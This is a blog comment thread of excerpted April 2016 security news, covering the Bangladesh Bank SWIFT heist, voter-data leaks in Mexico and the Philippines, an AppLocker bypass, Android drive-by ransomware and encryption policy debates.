Security trends for 2016

2,232 Comments

1. April 22, 2016 at 3:10 pm

   Tomi Engdahl says:

   Philippines Arrests Alleged Election Website Hacker
   http://www.securityweek.com/philippines-arrests-alleged-election-website-hacker

   Philippine officials said Thursday they have arrested a suspect in the hacking of the national election agency’s website ahead of next month’s presidential polls.

   The 23-year-old male suspect, who was arrested in Manila on Wednesday, told police he merely defaced the site to expose its vulnerability to potential breaches, they said.

   An Internet security firm has described the March 27 incident as potentially the world’s biggest government-related data breach, but officials said they had yet to verify if the released information had come from the Commission on Elections database.

   “He said he had no intention to harm. We got the computer he used so our forensic examination on the extent of the breach is ongoing,”

   “There are birthdays, ages, passport information. If it’s a faithful copy, they just had access to a bunch of this information but this is publicly accessible in general. Birthdays can be searched,” Jimenez said.

   Reply
2. April 22, 2016 at 3:16 pm

   Tomi Engdahl says:

   Hackers stole $80 million from a central bank because it had $10 routers and no firewall
   http://uk.businessinsider.com/r-bangladesh-bank-exposed-to-hackers-by-cheap-switches-no-firewall-police-2016-4?r=US&IR=T

   DHAKA (Reuters) – Bangladesh’s central bank was vulnerable to hackers because it did not have a firewall and used second-hand, $10 switches to network computers connected to the SWIFT global payment network, an investigator into one of the world’s biggest cyber heists said.

   The shortcomings made it easier for hackers to break into the system earlier this year and attempt to siphon off nearly $1 billion using the bank’s SWIFT credentials, said Mohammad Shah Alam, head of the Forensic Training Institute of the Bangladesh police’s criminal investigation department.

   “It could be difficult to hack if there was a firewall,” Alam said.

   The lack of sophisticated switches, which can cost several hundred dollars or more, also means it is difficult for investigators to figure out what the hackers did and where they might have been based, he added

   The police believe both the bank and SWIFT should take the blame for the oversight, Alam said in an interview.

   SWIFT has previously said the attack was related to an internal operational issue at Bangladesh Bank and that SWIFT’s core messaging services were not compromised.

   Cyber criminals broke into the bank’s systems and tried to make fraudulent transfers totalling $951 million from its account at the Federal Reserve Bank of New York in early February.

   Most of the payments were blocked but $81 million was routed to accounts in the Philippines and diverted to casinos there. Most of those funds remain missing.

   Lax Security

   Bangladesh Bank has about 5,000 computers used by officials in different departments, Alam said.

   The SWIFT room is roughly 12 feet by 8 feet, a window-less office located on the eight floor of the bank’s annex building in Dhaka. There are four servers and four monitors in the room.

   All transactions from the previous day are automatically printed on a printer in the room.

   The SWIFT facility should have been walled off from the rest of the network.

   Communications between the Fed and the Bangladesh central bank were hampered and the heist was discovered only after a delay

   The heist, which sent alarm bells ringing across the global financial system about cyber security, has turned into a global whodunit.

   Here’s How Hackers Stole $80 Million from Bangladesh Bank
   Monday, March 14, 2016 Swati Khandelwal
   http://thehackernews.com/2016/03/bank-hacking-malware.html

   How the Hackers managed to transfer $80 Million without leaving any Trace?

   Although the malware type has not been identified, the malicious software likely included spying programs that let the group learn how money was processed, sent and received.

   The malware in question could be a potential Remote Access Trojan (RAT) or a similar form of spyware that gave attackers the ability to gain remote control of the bank’s computer.

   The investigators suspect the hack could have exploited a “zero-day” flaw as they are unknown to vendors as well.

   After this, the hackers were able to steal the Bangladesh Bank’s credentials for the SWIFT messaging system, a highly secure financial messaging system utilized by banks worldwide to communicate with each other.

   Reply
3. April 22, 2016 at 3:45 pm

   Tomi Engdahl says:

   Core Windows Utility Can Be Used To Bypass Whitelisting
   https://it.slashdot.org/story/16/04/22/1513231/core-windows-utility-can-be-used-to-bypass-whitelisting

   A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft’s AppLocker.

   “It’s built-in remote code execution without admin rights and which bypasses Windows whitelisting. I’d say it’s pretty bad,”

   Bypass the Windows AppLocker bouncer with a tweet-size command
   Oh, you weren’t relying on that to lockdown your PCs, were you?
   http://www.theregister.co.uk/2016/04/22/applocker_bypass/

   If you’re relying on Microsoft’s AppLocker to lock down your office or school Windows PCs, then you should check this out. A security researcher says he’s found a way to potentially bypass the operating system’s software whitelist and launch arbitrary applications.

   A security researcher called Casey Smith has found that AppLocker can be potentially bypassed with a pretty simple command – thanks to the fact that Microsoft built a HTTP fetcher into one of its core utilities.

   JavaScript, Visual Basic and Powershell scripts can be run from the internet, or a local file, via regsvr32, according to Smith.

   “It’s built-in remote code execution without admin rights and which bypasses Windows whitelisting. I’d say it’s pretty bad,” said Alex Ionescu, a Windows and ARM kernel guru.

   Infosec researcher Kenn White said: “This just made a lot of corporate penetration testers very, very happy.”

   Reply
4. April 24, 2016 at 4:26 am

   Tomi Engdahl says:

   Jenna McLaughlin / The Intercept:
   Boston district court judge rules FBI hacking in child porn sting was illegal because magistrate judge that issued the search warrant was in another district — FBI Mass Child-Porn Hack Ruled Illegal on a Technicality — When the FBI hacked over 1,000 computers to ensnare consumers …

   FBI Mass Child-Porn Hack Ruled Illegal on a Technicality
   https://theintercept.com/2016/04/21/fbi-mass-child-porn-hack-ruled-illegal-on-a-technicality/

   When the FBI hacked over 1,000 computers to ensnare consumers of child pornography early last year, its actions were illegal, a federal judge ruled Wednesday.

   But the decision was based on a violation of jurisdictional rules, not constitutional ones — and precisely the jurisdictional rules the government hopes the Supreme Court will change within the next few weeks.

   In this case, a magistrate judge approved a warrant allowing the FBI to deploy malware to infect every visitor to a child-porn website called Playpen. Because users of the site were using Tor, a popular anonymity tool, the FBI couldn’t figure out who they were or where they were coming from — until the malware revealed their IP addresses.

   According to Rule 41 of federal criminal procedure, magistrate judges can’t authorize a warrant outside their geographical jurisdiction.

   The Department of Justice is seeking to change that rule, but it hasn’t happened yet.

   Government lawyers two years ago began the multi-stage process of changing the rule to allow judges to grant warrants for remote searches of computers located outside their district or when the location is unknown. Despite angry protests from civil liberties advocates and technologists

   “The judge clearly is not happy about the government operating a child-porn site,”

   Reply
5. April 24, 2016 at 4:52 am

   Tomi Engdahl says:

   Office of Inadequate Security:
   An unsecured database with 93.4M Mexican voter records found hosted on AWS, now taken offline

   Personal info of 93.4 million Mexicans exposed on Amazon (UPDATED)
   http://www.databreaches.net/personal-info-of-93-4-million-mexicans-exposed-on-amazon/

   In today’s installment of “Epic Infosecurity #FAIL,” more than 93.4 million Mexican citizens have had their voter registration details exposed online due to a misconfigured database. Why a database with Mexican voters’ information was hosted on a server outside of Mexico, who uploaded it to Amazon, and why it wasn’t properly secured are questions in search of answers.

   Last week, MacKeeper Security Researcher Chris Vickery contacted DataBreaches.net to report that he had discovered yet another misconfigured MongoDB database. This one, 132 GB in size, appeared to contain voter registration data from 93,424,710 Mexican citizens.

   The record contains the individual’s name, complete address, date of birth, mother’s and father’s last names, occupation, and their unique voting credential code (number/identifier).

   Although there was no information included in the leaky database that could point us to its owner or who had uploaded it to Amazon cloud services, the data appeared to be voter registration data compiled by the Instituto Nacional Electoral (INE).

   After some discussion as to whom to notify and how, Chris decided to report his discovery to the State Department and let them contact their Mexican counterparts in the spirit of cooperation. When he got no meaningful response, he reached out to the State Department’s Office of Mexican Affairs, who told him they would forward his alert up the chain. When that still didn’t achieve the desired results of getting the database secured, Chris contacted the U.S. Secret Service, Department of Homeland Security, and US-CERT. He also contacted the Mexican embassy directly:

   After I explained the situation over the phone, they wanted proof of the breach and gave me an email address to send it to. I sent them an explanation with the IP address and two screenshots as evidence. The embassy has never even responded to that email.

   (First lesson to be learned by INE: provide an easy-to-find email address on your web site for people to report security breaches.)

   As fate would have it, though, Chris was speaking up at Harvard about his research and mentioned the leak. A student from Mexico verified the accuracy of his father’s record, and a faculty member tried to assist Chris with the notification problem by giving him other individuals to contact. Chris eventually heard back from someone from the Instituto Federal Electoral, (IFE/INE), who thanked Chris and who said they would get right on getting it secured. Of note, the coordinator said that the IP address was not theirs and he was investigating to see who was responsible for the database being on that IP address.

   The database has now been secured.

   Publication of this post was delayed until now at the request of the Mexican government to give them time to investigate and to secure the database.

   The Risk to Mexican Citizens

   This is not the first time voter registration information of Mexican citizens has been leaked or otherwise compromised. In what became an international incident in 2003, Latin American countries learned that ChoicePoint was buying – and selling – information on citizens of their countries.

   “This incident clearly erodes the confidence of citizens in a lot of government bodies. Some citizens might decide to never provide their data again to the INE, the next time their ID expires,”

   Entire Countries Breached

   With this leak, Mexico now joins a list of countries where almost the entire population has had their personal information leaked or breached, as 93.4 million represents over 72% of Mexico’s estimated population. Belize, Greece, Israel, Philippines, and Turkey have also experienced leaks of the majority of their population’s personal information. And of course, let’s not forget that Chris Vickery had also discovered 191 million U.S. voters‘ data leaking due to a similarly misconfigured database.

   BREAKING: Massive Breach of Mexican Voter Data
   https://mackeeper.com/blog/post/217-breaking-massive-data-breach-of-mexican-voter-data

   In my hands is something dangerous. It is proof that someone moved confidential government data out of Mexico and into the United States. It is a hard drive with 93.4 million downloaded voter registration records— The Mexican voter database.

   Before going any further, let’s make one thing very clear. I’m not the one who transmitted the data out of Mexico. Someone else will have to answer for that. However, eight days ago (April 14th), I did discover a publicly accessible database, hosted on an Amazon cloud server, containing these records. There was no password or authentication of any sort required. It was configured purely for public access. Why? I have no clue.

   After reporting the situation to the US State Department, DHS, the Mexican Embassy in Washington, the Mexican Instituto Nacional Electoral (INE), and Amazon, the database was finally taken offline April 22nd, 2016.

   Under Mexican law, these files are “strictly confidential”, carrying a penalty of up to 12 years in prison for anyone extracting this data from the government for personal gain. We’re talking about names, home addresses, birthdates, a couple of national identification numbers, and a few other bits of info.

   Reply
6. April 24, 2016 at 4:55 am

   Tomi Engdahl says:

   Ashley Madison Hack Victims Can’t Sue Anonymously

   If you want to sue Ashley Madison for the hack that leaked the names of its customers, you’ll have to use your real name, which sounds like a fun way to relive a terrible day.

   More Than a Million People Access Facebook Over Tor

   Opera Adds a VPN to Its Browser

   Though they’re mostly known for helping people dodge regional content restrictions, VPNs can be handy for all kinds of things, including masking your online activity. They can require a little bit of technological know-how, though, or at the very least an extra download. But wait! The latest developer version of the Opera desktop browser now has a (free) VPN built right in.

   ch Giants Pen Open Letter Opposing Proposed Encryption Bill

   The Burr-Feinstein encryption bill is historically bad, and the Reform Government Surveillance group would like Congress to know it.

   Source: http://www.wired.com/2016/04/security-week-sue-ashley-madison-youll-use-real-name/

   Reply
7. April 24, 2016 at 4:55 am

   Tomi Engdahl says:

   Chinese takeover target Opera Software embeds browser security tool
   http://www.reuters.com/article/us-opera-software-m-a-china-idUSKCN0XI1GN

   Norwegian online browser and advertising firm Opera Software , the takeover target of a Chinese consortium of Internet firms, has embedded a tool in its latest desktop app that can be used to circumvent censorship.

   Opera said on its blog on Thursday that the newest version of its desktop Internet browser, which is targeted at developers, includes a free built-in Virtual Private Network (VPN), which can be used for getting round online censorship.

   “Regarding China we already have servers in China and are running this through a Chinese IT company which is in compliance with Chinese laws,” Opera CEO Lars Boilesen told Reuters.

   “China is not a huge market for us on desktop. So this launch has nothing to do with China,” he said.

   Opera is the subject of a $1.28 billion acquisition by a consortium of Chinese firms, including web search and security firm Qihoo 360 Technology Co Ltd and Beijing Kunlun Tech Co.

   Reply
8. April 24, 2016 at 4:56 am

   Tomi Engdahl says:

   Reuters:
   $81M hack of Bangladesh central bank made possible by second-hand $10 switches linking computers connected to SWIFT global payment network, and no firewall — Bangladesh Bank exposed to hackers by cheap switches, no firewall: police — Bangladesh’s central bank was vulnerable to hackers …

   Bangladesh Bank exposed to hackers by cheap switches, no firewall: police
   http://www.reuters.com/article/us-usa-fed-bangladesh-idUSKCN0XI1UO

   Bangladesh’s central bank was vulnerable to hackers because it did not have a firewall and used second-hand, $10 switches to network computers connected to the SWIFT global payment network, an investigator into one of the world’s biggest cyber heists said.

   The shortcomings made it easier for hackers to break into the Bangladesh Bank system earlier this year and attempt to siphon off nearly $1 billion using the bank’s SWIFT credentials, said Mohammad Shah Alam, head of the Forensic Training Institute of the Bangladesh police’s criminal investigation department.

   “It could be difficult to hack if there was a firewall,” Alam said in an interview.

   Reply
9. April 24, 2016 at 5:05 am

   Tomi Engdahl says:

   Eric Lichtblau / New York Times:
   Six prominent ex-national security officials, who now work at firms with ties to the tech sector, support Apple on encryption

   On Encryption Battle, Apple Has Advocates in Ex-National Security Officials
   http://www.nytimes.com/2016/04/23/business/on-encryption-battle-apple-has-advocates-in-ex-national-security-officials.html

   WASHINGTON — In their years together as top national security officials, Michael V. Hayden and Michael Chertoff were fierce advocates of using the government’s spying powers to pry into sensitive intelligence data.

   But today, their jobs have changed, and so, apparently, have their views on privacy. Both former officials now work with technology companies like Apple at a corporate consulting firm that Mr. Chertoff founded, and both are now backing Apple — and not the F.B.I., with which they once worked — in its fight to keep its iPhones encrypted and private.

   They are among more than a half-dozen prominent former national security officials who, to varying degrees, have supported Apple and the idea of impenetrable “end-to-end encryption” during a furious national debate over the balance between privacy and security in the digital age.

   Reply
10. April 24, 2016 at 6:18 am

    Tomi Engdahl says:

    Ad-blocker blocking websites face legal peril at hands of privacy bods
    Publisher’s software could break EU cookie laws
    http://www.theregister.co.uk/2016/04/23/anti_ad_blockers_face_legal_challenges/

    Websites that detect ad-blockers to stop their users from reading webpages could be illegal under European law.

    Alexander Hanff, a privacy campaigner and programmer, says he has received a letter from the European Commission confirming that browser-side web scripts that pick out advert blockers access people’s personal data (ie: the plugin stored on their computer). Thus, just like you need to give permission to EU websites to access and store your cookies, ad-blocker detectors must ask for permission before probing your browser.

    Therefore, under EU law in force since May 2011, people must give their consent before an anti-ad-blocker script can run and hide content on a page. Of course, while waiting for that consent from a visitor, the site could refuse to show anything, but then the publisher will scare off all readers, even the ones who turn out to be not running anti-ad plugins. If the page is viewable while waiting for the consent, then blocking ad-blockers is pointless.

    Reply
11. April 24, 2016 at 6:47 am

    Tomi Engdahl says:

    This Teddy Bear Steals Your Ubuntu Secrets
    http://hackaday.com/2016/04/22/this-teddy-bear-steals-your-ubuntu-secrets/

    Ubuntu just came out with the new long-term support version of their desktop Linux operating system. It’s got a few newish features, including incorporating the “snap” package management format. One of the claims about “snaps” is that they’re more secure — being installed read-only and essentially self-contained makes them harder to hack across applications. In principle.

    [mjg59] took issue with their claims of increased cross-application security. And rather than just moan, he patched together an exploit that’s disguised as a lovable teddy bear. The central flaw is something like twenty years old now; X11 has no sense of permissions and any X11 application can listen in on the keyboard and mouse at any time, regardless of which application the user thinks they’re providing input to. This makes writing keylogging and command-insertion trojans effortless, which is just what [mjg59] did. You can download a harmless version of the demo at [mjg59]’s GitHub.

    Circumventing Ubuntu Snap confinement
    http://mjg59.dreamwidth.org/42320.html

    Reply
12. April 25, 2016 at 6:35 am

    Tomi Engdahl says:

    Cyber Insurance: Security Tool or Hype?
    http://www.securityweek.com/cyber-insurance-security-tool-or-hype

    A few months back, I was a passive observer to an interesting email thread. People on the thread were discussing a breach that was big news at the time. Suggestions were made as to why the breach occurred, how it may have occurred, how the response could have been better executed, among many other points. At one point in the discussion, one individual decided to interject the concept of cyber insurance in a mocking and condescending tone. In other words, the individual did not feel that cyber insurance was a valid topic worthy of serious discussion.

    In the past, I’ve written about the challenges that the security community has with mocking and condescending, and the tremendous disservice it does us in terms of improving the state of security. I don’t wish to further discuss that subject in this piece, though this incident does raise another interesting discussion. Is cyber insurance a valid tool in the security professional’s tool belt, or is it merely hype? Although mocking and condescending is never justified in my opinion, it is possible to understand those who would respond to extreme hype in that manner.

    For our purposes, at an executive or board level, the risk from a security issue (sometimes referred to as a cyber event) can be rolled up into two main categories at a strategic level:

    ● Near-term costs incurred because of incident response, liabilities, notification requirements, fines, penalties, legal fees, and other such expenses

    ● Long-term costs incurred because of damage to the business, damage to the brand reputation, loss of customer confidence, loss of business partners, and other such losses

    What we quickly realize when we look at risk from a strategic perspective is that it all comes down to cost. There are many details and moving parts to a holistic security program based upon a sound and strategic risk mitigation strategy. But when boards and executives think about security, they think about costs. What will it cost for me to mitigate the risk that I will suffer significant losses and incur significant costs in the event of a security incident or breach? As security professionals, wee may not like the way that point of view feels, but it’s important that we understand it.

    When we think of security in these terms, we can begin to see how cyber insurance fits into the broader context of a security strategy focused on risk mitigation. In some cases, people, process, and technology may be able to mitigate huge risks and huge potential costs for a reasonable investment. In other cases, the investment required to properly mitigate a risk through people, process, and technology may be disproportionately high. If that is the case, what is an organization to do?

    This is where cyber insurance can play a role in rounding out an organization’s risk mitigation strategy. Of course, cyber insurance varies widely in what it covers and at what levels, so it’s important to thoroughly examine coverage when shopping around.

    It’s also important to remember what cannot be covered, such as theft of intellectual property and remediation of a breach.

    Reply
13. April 25, 2016 at 6:37 am

    Tomi Engdahl says:

    Windows AppLocker Bypassed to Execute Remote Scripts
    http://www.securityweek.com/windows-applocker-bypassed-execute-remote-scripts

    Microsoft’s Windows AppLocker, a feature introduced in Windows 7 to specify which users can run apps within an organization, can be bypassed to execute remote scripts on a machine, a researcher says.

    Reply
14. April 25, 2016 at 6:38 am

    Tomi Engdahl says:

    Attackers Use PowerShell, Google Docs to Deliver “Laziok” Trojan
    http://www.securityweek.com/attackers-deliver-laziok-trojan-google-docs

    Malicious actors have abused PowerShell and Google Docs to deliver a Trojan known as Laziok, FireEye reported on Thursday.

    Laziok, a reconnaissance tool and information stealer, was first spotted last year when a threat group leveraged the malware in a sophisticated multi-stage attack campaign targeting energy companies in the Middle East. Attackers exploited an old Windows vulnerability tracked as CVE-2012-0158 to drop the Trojan onto users’ systems.

    According to FireEye, attackers found a way to bypass Google’s security checks and uploaded the malicious payload to Google Docs. The malware was uploaded in March and remained there until Google was notified by the security firm.

    “Users are not usually able to download malicious content from Google Docs because Google actively scans and blocks malicious content. The fact that this sample was available and downloadable on Google Docs suggests that the malware evaded Google’s security checks,” researchers said. “Following our notification, Google promptly removed the malicious file and it can no longer be fetched.”

    Reply
15. April 25, 2016 at 6:38 am

    Tomi Engdahl says:

    Ransomware: A Formidable Enterprise Threat
    http://www.securityweek.com/ransomware-formidable-enterprise-threat

    Ransomware’s extortion-based business model, currently the latest major trend in the cybercrime industry, is marking a major change in the purpose and outcome of malware attacks and has become a major threat to consumers and enterprises alike.

    Almost unheard of a few years ago, ransomware attacks are making the headlines almost daily, with new malware families emerging nearly every week. This should not be surprising, as the underlining business model for cybercriminals it to hit as many victims as possible and monetize attacks before security researchers react and block their malicious activities.

    Ransomware attacks are carried out in a similar manner each time, regardless of the ransomware family involved: the malware is distributed via spam emails or exploit kits, files are encrypted (usually using AES encryption), and the victim is urged to pay a ransom of $200–$400 in order to recover their files. That might not seem like a lot, but crooks have already made off with hundreds of millions from extorting a large number of victims.

    Ransomware operators almost exclusively use Bitcoin addresses for payments in an attempt to hide their identities.

    Reply
16. April 25, 2016 at 6:39 am

    Tomi Engdahl says:

    Why You Need Visibility of Your Supply Chain Cyber Risks
    http://www.securityweek.com/why-you-need-visibility-your-supply-chain-cyber-risks

    When it comes to cybersecurity, the common tact is to build out your network defenses and then extend to endpoints. But as business becomes more connected and as data moves further outside the organizational walls, enterprises must look at weaknesses across each area that depends on technology – and a good place to focus is on the supply chain.

    Think about how many partners, suppliers and customers have access to different areas of your business. According to the 2016 Vendor Vulnerability survey from Bomgar, an average of 89 third-party vendors access a typical company’s network each week, and 75% of the surveyed organizations said the number of third parties they work with has increased over the last two years. Additionally more and more companies are outsourcing critical business infrastructure to third parties that provide numerous “As-A-Service” capabilities. This in turn creates or magnifies an additional business resilience risk that is largely unchecked.

    Each of these touch points creates another area of possible exploitation. But the risk posed by the growing number of third parties is often not adequately addressed. In fact, PwC’s 2015 U.S. State of Cybercrime Survey found only 16% of respondents evaluate third parties’ cybersecurity more than once a year – and nearly a quarter do not evaluate third parties at all. Ever.

    Reply
17. April 25, 2016 at 6:44 am

    Tomi Engdahl says:

    Lorenzo Franceschi-Bicchierai / Motherboard:
    DARPA seeks encrypted comms app with blockchain infrastructure, message repudiation, self-deleting messages, more in Small Business Technology Transfer request

    DARPA Is Looking For The Perfect Encryption App, and It’s Willing to Pay
    http://motherboard.vice.com/read/darpa-decentralized-blockchain-encryption-messaging-app

    While the FBI keeps crying wolf about the dangerous dark future where criminals use technology that’s impossible to spy on, the Pentagon’s blue-sky research arm wants someone to create the ultimate hacker-proof messaging app.

    The Defense Advanced Research Projects Agency, better known as DARPA, is looking for a “secure messaging and transaction platform” that would use the standard encryption and security features of current messaging apps such as WhatsApp, Signal, or Ricochet, but also use a decentralized Blockchain-like backbone structure that would be more resilient to surveillance and cyberattacks.

    DARPA’s goal is to have “a secure messaging system that can provide repudiation or deniability, perfect forward and backward secrecy, time to live/self delete for messages, one time eyes only messages, a decentralized infrastructure to be resilient to cyber-attacks, and ease of use for individuals in less than ideal situations,” according to a notice looking for proposals, which was recently posted on a government platform that offers federal research funds to small businesses.

    DARPA wants “a public wall anyone can monitor or post messages on, but only correct people can decrypt.”

    Reply
18. April 25, 2016 at 6:46 am

    Tomi Engdahl says:

    Anti-Encryption Social Media Campaign Backfires Spectacularly
    http://motherboard.vice.com/read/nypd-manhattan-prosecutor-unlockjustice-anti-encryption-social-media-campaign-backfires?trk_source=recommended

    As even the most deft social media ninja will tell you, social media campaigns are hard. But it really seems like the New York Police Department should have seen this one coming.

    A coalition led by the NYPD and Manhattan’s top prosecutor launched a campaign to “highlight the impact encryption is having on public safety and victims of crime” on Monday. The campaign took off with a press conference on the steps of Manhattan’s City Hall, along with a hashtag, #UnlockJustice, designed to garner social media support.

    “Americans have a right to privacy, but crime victims and surviving family members have rights, too–namely, the right to have cases solved with the strongest evidence available,” Manhattan’s District Attorney Cyrus Vance said.

    But the hashtag launched along the campaign fell flat, and soon backfired. Several people, including tech and security experts, hijacked the hashtag to criticize the coalition’s campaign.

    “Governments are trying to get engaged with the internet while not understanding how the internet works,” Amie Stepanovich, the policy manager at Access Now, a digital rights group, told me.

    “Seriously, whoever in the NYPD and the Manhattan DA’s office greenlighted this needs to get a different job,”

    This is not the first time something like this happens.

    Reply
19. April 25, 2016 at 7:12 am

    Tomi Engdahl says:

    Hacker Collective Attacks KKK Sites
    https://politics.slashdot.org/story/16/04/24/0425232/hacker-collective-attacks-kkk-sites

    A KKK web site went offline for several hours Saturday, part of an ongoing attack campaign being attributed to “several hacker collectives, including Anonymous and BinarySec, under a loosely-coordinated operation theyâ(TM)re calling #OpKKK.” The Epoch Times newspaper reports that “Over the course of the last couple months, websites belonging to the KKK flicked off and on, members of the hate group have had their identities posted online, and their recruiting efforts have been attacked.”

    Hackers Have Launched a War Against the KKK and the Spread of Online Hate
    http://www.theepochtimes.com/n3/2031112-hackers-have-launched-a-war-against-the-kkk-and-the-spread-of-online-hate/

    Hackers are launching a campaign against the promotion of hatred and racism online, and one of their main targets is the Ku Klux Klan (KKK).

    Over the course of the last couple months, websites belonging to the KKK flicked off and on, members of the hate group have had their identities posted online, and their recruiting efforts have been attacked.

    This has been the work of several hacker collectives, including Anonymous and BinarySec, under a loosely-coordinated operation they’re calling #OpKKK.

    “The average American likely believes hate groups like the KKK are all but dead and gone, restricted now to a handful of secret enclaves consisting of a few dying old racist men,”

    “But, part of OpKKK is bringing attention to the fact that these groups are not dead and are in fact finding a new life online,”

    Reply
20. April 25, 2016 at 8:41 am

    Tomi Engdahl says:

    Win XP, Flash, Java… healthcare makes easy pickings for hackers
    Study shows some medical folk are still running an OS not supported since 2014
    http://www.theregister.co.uk/2016/04/22/healthcare_insecurity/

    The healthcare industry is a long way behind the financial sector in basic security practices, according to a study by two factor authentication firm Duo Security.

    Duo found that healthcare devices were significantly more out of date and less secure than ones from finance, after comparing its healthcare customers’ devices to its finance customers’ equipment.

    Healthcare has a four times greater density of Windows XP computers compared to finance. Windows XP has been unsupported by Microsoft since 2014 and unsupported OSes do not receive any software patches or updates, making them an easy target for attackers.

    The risk is far from theoretical. For example, earlier this year Melbourne Health’s networks were infected with malware after an attack compromised the Royal Melbourne Hospital’s pathology department, which was running Windows XP.

    The Qbot malware linked to the infection is capable of stealing passwords and logging keystrokes.

    A significant minority (three per cent) of Duo’s installed base is stuck on Windows XP, which compares to one per cent of users across Duo’s entire client base. Across that customer base, finance has 50 per cent more instances of computers running on the Windows 10 operating system than healthcare.

    Finance has more instances of computers running on Windows 7 (74 per cent) than healthcare (66 per cent). Staying with older versions of Microsoft’s OS can have security downsides, even if the operating system is still supported.

    With more than 500 known vulnerabilities affecting Windows 7, there are many ways for an attacker to easily exploit flaws on the outdated OS to gain unauthorised access to a healthcare organisation’s computing environment, Duo warns.

    Twice as many healthcare endpoints have Flash installed and three times as many healthcare customers have Java installed on their devices, again putting them at greater risk of vulnerabilities and exploitation.

    Only 12 per cent of non-healthcare users have Java installed. compared to 36 percent in healthcare. Many popular electronic healthcare record (EHRs) systems and identity access and management (IAM) software supporting e-prescriptions require the use of Java, factors which could account for the higher installed base. But this is bad news for security because Java browser plug-ins are a popular exploit route for hackers.

    Reply
21. April 25, 2016 at 10:28 am

    Tomi Engdahl says:

    Opera VPN behind the curtains is just a proxy, here’s how it works
    https://gist.github.com/spaze/558b7c4cd81afa7c857381254ae7bd10

    When setting up (that’s immediately when user enables it in settings) Opera VPN sends few API requests to https://api.surfeasy.com to obtain credentials and proxy IPs, see below, also see The Oprah Proxy.

    The browser then talks to a proxy de0.opera-proxy.net (when VPN location is set to Germany), it’s IP address can only be resolved from within Opera when VPN is on, it’s 185.108.219.42 (or similar, see below). It’s an HTTP/S proxy which requires auth.

    When loading a page with Opera VPN enabled, the browser sends a lot of requests to de0.opera-proxy.net with Proxy-Authorization request header.

    This Opera “VPN” is just a preconfigured HTTP/S proxy protecting just the traffic between Opera and the proxy, nothing else. It’s not a VPN.

    They even call it Secure proxy (besides calling it VPN, sure) in Opera settings.

    Reply
22. April 25, 2016 at 10:31 am

    Tomi Engdahl says:

    $10 router blamed in Bangladesh bank hack
    http://www.bbc.com/news/technology-36110421

    Hackers managed to steal $80m (£56m) from Bangladesh’s central bank because it skimped on network hardware and security software, reports Reuters.

    The bank had no firewall and used second-hand routers that cost $10 to connect to global financial networks.

    Better security and hardware would have hampered the attackers, Reuters said, quoting an official investigator.

    A firewall would have made attempts to hack the bank more “difficult”

    A firewall would have made attempts to hack the bank more “difficult”

    The cheap routers have hindered the investigation, said Mr Alam, because they collected very little network data that could be used to pinpoint the hackers and shed light on their tactics.

    Reply
23. April 25, 2016 at 7:51 pm

    Tomi Engdahl says:

    Passwords? Just Use Your Head!
    http://hackaday.com/2016/04/25/passwords-just-use-your-head/

    Biometrics–the technique of using something unique about your body as a security device–promises to improve safety while being more convenient than a password. Fingerprints, retinal scans, and voice identification have all found some use, although not without limitations.

    Now researchers in Germany want you to use your head, literally. SkullConduct measures vibrations of your skull in response to a sonic signal. A small prototype was successful and is particularly well suited for something you are holding up to your head anyway, like a smartphone or a headset like a Google Glass.

    SkullConduct: Biometric User Identification on Eyewear
    Computers Using Bone Conduction Through the Skull
    https://perceptual.mpi-inf.mpg.de/files/2016/01/schneegass16_chi.pdf

    Reply
24. April 25, 2016 at 7:55 pm

    Tomi Engdahl says:

    Jim Finkle / Reuters:
    Researchers: cybercriminals used malware to subvert the SWIFT interbank messaging network and steal $81M from Bangladesh’s central bank; SWIFT releases patch — Bangladesh Bank hackers compromised SWIFT software, warning issued — The attackers who stole $81 million from the Bangladesh …

    Bangladesh Bank hackers compromised SWIFT software, warning issued
    http://www.reuters.com/article/us-usa-nyfed-bangladesh-malware-exclusiv-idUSKCN0XM0DR

    The attackers who stole $81 million from the Bangladesh central bank probably hacked into software from the SWIFT financial platform that is at the heart of the global financial system, said security researchers at British defense contractor BAE Systems.

    SWIFT, a cooperative owned by 3,000 financial institutions, confirmed to Reuters that it was aware of malware targeting its client software. Its spokeswoman Natasha Deteran said SWIFT on Monday released a software update to thwart the malware, along with a special warning for financial institutions to scrutinize their security procedures.

    The developments coming to light the unprecedented cyber-heist suggest that a lynchpin of the global financial system could be more vulnerable than previously understood because of weaknesses that enabled attackers to modify a SWIFT software program installed on bank servers.

    The new evidence suggests that hackers manipulated the Alliance Access server software, which banks use to interface with SWIFT’s messaging platform, in a bid to cover up fraudulent transfers that had been previously ordered.

    The findings from BAE and SWIFT do not explain how the fraudulent orders were created and pushed through the system.

    The SWIFT messaging platform is used by 11,000 banks and other institutions around the world, though only some use the Alliance Access software, Deteran said.

    “I can’t think of a case where we have seen a criminal go to the level of effort to customize it for the environment they were operating in,” he said. “I guess it was the realization that the potential payoff made that effort worthwhile.”

    Monday’s alert from BAE includes some technical indicators that the firm said it hopes banks could use to thwart similar attacks.

    While that malware was specifically written to attack Bangladesh Bank, “the general tools, techniques and procedures used in the attack may allow the gang to strike again, “according to a draft of the warning that BAE shared with Reuters.

    Reply
25. April 25, 2016 at 7:56 pm

    Tomi Engdahl says:

    Dan Goodin / Ars Technica:
    Critical Android bugs present in older devices now targeted by malvertising campaigns and other drive-by exploits — Active drive-by exploits critical Android bugs, care of Hacking Team — Hostile JavaScript delivered through ads installs ransomware on older Android phones.

    Active drive-by exploits critical Android bugs, care of Hacking Team
    Hostile JavaScript delivered through ads installs ransomware on older Android phones.
    http://arstechnica.com/security/2016/04/active-drive-by-attacks-exploit-critical-android-bugs-care-of-hacking-team/

    An ongoing drive-by attack is forcing ransomware onto Android smartphones by exploiting critical vulnerabilities in older versions of Google’s mobile operating system still in use by millions of people, according to research scheduled to be published Monday.

    The attack combines exploits for at least two critical vulnerabilities contained in Android versions 4.0 through 4.3, including an exploit known as Towelroot, which gives attackers unfettered “root” access to vulnerable phones. The exploit code appears to borrow heavily from, if not copy outright, some of these Android attack scripts, which leaked to the world following the embarrassing breach of Italy-based Hacking Team in July. Additional data indicates devices running Android 4.4 may also be infected, possibly by exploiting a different set of vulnerabilities.

    It’s the first time—or at least one of only a handful of times—Android vulnerabilities have been exploited in real-world drive-by attacks.

    Reply
26. April 25, 2016 at 8:22 pm

    Tomi Engdahl says:

    Sarah Perez / TechCrunch:
    Hundreds of Spotify users’ credentials appear online, and users report accounts hacked; Spotify denies being hacked

    Hundreds of Spotify credentials appear online – users report accounts hacked, emails changed
